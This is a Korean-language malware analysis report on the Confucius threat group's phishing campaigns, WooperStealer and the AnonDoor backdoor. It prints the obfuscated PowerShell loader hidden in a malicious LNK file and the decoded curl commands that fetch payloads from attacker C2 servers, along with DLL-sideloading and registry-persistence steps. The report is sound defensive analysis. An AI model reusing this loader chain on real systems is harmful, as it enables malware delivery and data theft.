악성코드 분석 2025-10-30
Confucius
공격
그룹은 남아시아 전역에서 장기간 활동해 온 대표적인 사이버 공격 그룹으로, 2013년
처음 식별된 이후 지금까지 꾸준히 활동을 이어오고 있다. Confucius 그룹은
남아시아 지역의 국가와 밀접하게 연계된 것으로 추정되며, 공공 기관·군사 조직·방위산업체 등 전략적 가치가 높은 기관을 주요 표적으로 삼고
있다.
초기에는
스피어피싱
이메일을 통해 악성 문서를 유포하고,
이를
열람한 사용자의 시스템에서 정보를 수집하는 형태의 공격이 주를 이루었다. 그러나 시간이 지남에 따라 공격 기법이 고도화되어,
최근
발견된 캠페인에서는 AnonDoor라고
불리는 파이썬
기반의 백도어를
이용하여 지속적인 감시와 원격제어를 수행하는 형태로 전환되었다. 이러한 변화는 Confucius
그룹이
보안 기술의 발전에 맞춰 빠르게 공격 기법을 발전 시키고, 그러한 기술력이 뒷받침 된다는 것을 보여준다.
초기 Confucius 그룹은 피싱 메일을 이용해 공격을 진행했다. 해당 메일에는 Document.ppsx 라는 악성 파일이 첨부되어 있으며 공격자는 메일 수신자가 해당 첨부 파일을 다운로드 하도록 유도한다. 해당 ppsx 파일을 열람할 경우 “Corrupted File(손상된 파일)”이라는 페이지가 출력되며, 백그라운드에 악성 스크립트가 실행된다. 해당 파일을 압축해제 할 경우 내부의 xml 파일을 확인할 수 있다.


ppsx 파일 열람 시 백그라운드에서 실행되는 스크립트는 “slide1.xml.rels” 파일로 “hxxps://greenxeonsr[.]info/” 라는 C2 서버에서 mango44NX.doc 라는 파일을 다운로드 받는다.

mango44NX.doc 파일은 지속성을 갖춘 VBScript로 열람 시 스크립트 코드가 나타난다.

해당 스크립트를 살펴보면 먼저 C2 서버 hxxp://greenxeonsr[.]info/Jsdfwejhrg[.]rko 에서 페이로드를 다운로드 한 후 C:\Users\[currenUser]\AppData\Local\ 폴더 아래에 Mapistub.dll 이라는 이름으로 저장한다.

Mapistub.dll 이라는 이름으로 파일을 저장한 후 해당 파일이 저장된 동일한 폴더 경로에 C:\Windows\System32\fixmapi.exe 이라는 정상 파일을 Swom.exe 이라는 이름으로 복사한다.

마지막으로 복사한 Swom.exe 파일을 지속성 유지를 위해 레지스트리 HKCU\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\ 에 등록한다. load 값이 경로로 지정되어 있을 경우 부팅 시 자동실행 될 수 있다. 그 다음 Shell.Application을 이용해 Swom.exe를 실행한다.

정상 파일인 Swom.exe에 악성 dll인 Mapistub.dll이 삽입되어 실행되며, 먼저 2개의 C2 사이트(cornfieldblue[.]info, hauntedfishtree[.]info )에서 파일을 다운로드하여 로드한다.


최종적으로 다운로드 되는 악성코드는 WooperStealer로 특정 확장자를 가진 파일 형식을 수집하여 C2서버 hxxp://marshmellowflowerscar[.]info에 업로드한다.

2025년 초, Confucius 그룹은 LNK 파일을 이용한 공격으로 전술을 변경했다. 확장자를 pdf.lnk로 할 경우 해당 파일은 정상 pdf 파일처럼 보이게 된다. 하지만 속성을 확인할 경우 악의적인 스크립트가 삽입되어 있는 것을 확인할 수 있다.

삽입된 스크립트는 아래와 같다. C:\Users\[users]\AppData\Local 경로에 fixmapi.exe 파일을 BlueAle.exe 라는 이름으로 복사한다. 그런 다음 숫자 배열을 디코딩해 IEX로 실행한다.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-C
"$pa=$env:LocalAppData;
$c=$pa+'\BlueAle.exe';
Copy
C:\Windows\System32\fixmapi.exe $c;
437,455,452,446,370,383,449,370,378,374,450,435,370,381,370,377,430,447,435,450,443,453,454,455,436,384,
438,446,446,377,379,370,372,442,454,454,450,453,396,385,385,450,439,454,452,443,437,441,452,439,439,448,
384,443,448,440,449,385,420,418,426,408,406,389,394,425,403,418,420,393,384,452,445,449,372,397,374,444,
399,374,439,448,456,396,422,415,418,370,381,370,377,430,440,443,446,439,384,450,438,440,377,397,370,437,
455,452,446,370,383,449,370,374,444,370,372,442,454,454,450,453,396,385,385,450,439,454,452,443,437,441,
452,439,439,448,384,443,448,440,449,385,404,425,416,395,428,403,418,384,452,445,449,372,397
|%{$x+=[char]($_-338)};
$x|IEX;
start$j;
Start-Sleep-Seconds5;
start$c"
숫자 배열을 디코딩할 경우 아래와 같은 명령어가 된다. hxxps://petricgreen[.]info/RPXFD38WAPR7[.]rko에서 다운로드한 페이로드를 BlueAle.exe를 복사한 경로에 mapistub.dll로 저장한다. 또한 temp 경로에 pdf파일을 다운로드 한다.
curl
-o ($pa + '\mapistub.dll') "https://petricgreen.info/RPXFD38WAPR7.rko";
$j=$env:TMP + '\file.pdf';
curl -o $j
"https://petricgreen.info/BWN9ZAP.rko";
mapistub.dll을 실행하면 mapistub.dll 파일과 BlueAle.exe 파일을 C:\Windows\Task 에 복사하고 레지스트리에 추가하여 지속성을 유지한다.

Document.ppsx에서 사용했던 Mapistub.dll과 마찬가지로 2개의 C2 서버(petricgreen[.]info, sohbettr[.]info) 에서 추가 데이터를 다운로드 한다. 추가로 다운로드 되는 데이터 또한 WooperStealer로 식별되며 특정 경로에서 특정 확장자를 가진 파일들을 수집한다.

WooperStealer는 3개의 파라미터를 사용해 POST 요청으로 수집한 정보를 업로드 한다. value1에는 시스템 식별자, value2에는 파일경로, value3에는 파일 해시가 전송된다.


현재 Confucius 그룹은 WooperStealer가 아니라 새로운 AnonDoor 파이썬 백도어를 사용하는 정황이 발견되었다. 이는 단순한 정보 수집에서 벗어나 장기적 침투와 원격제어를 통한 지속적 정보수집 전술로 초점이 이동했음을 의미한다. 파이썬 기반 백도어는 기존 시그니처 기반 탐지로 식별하기 어려운 은닉성을 가지며, LNK 등과 결합될 경우 탐지 난이도가 높아진다. 따라서 기업은 행위 기반 모니터링, 이메일, 문서 취약점 차단, 원격 코드 실행 경로에 대한 집중 점검을 통해 진화 하는 공격 전술에 대비하는 것이 바람직하다.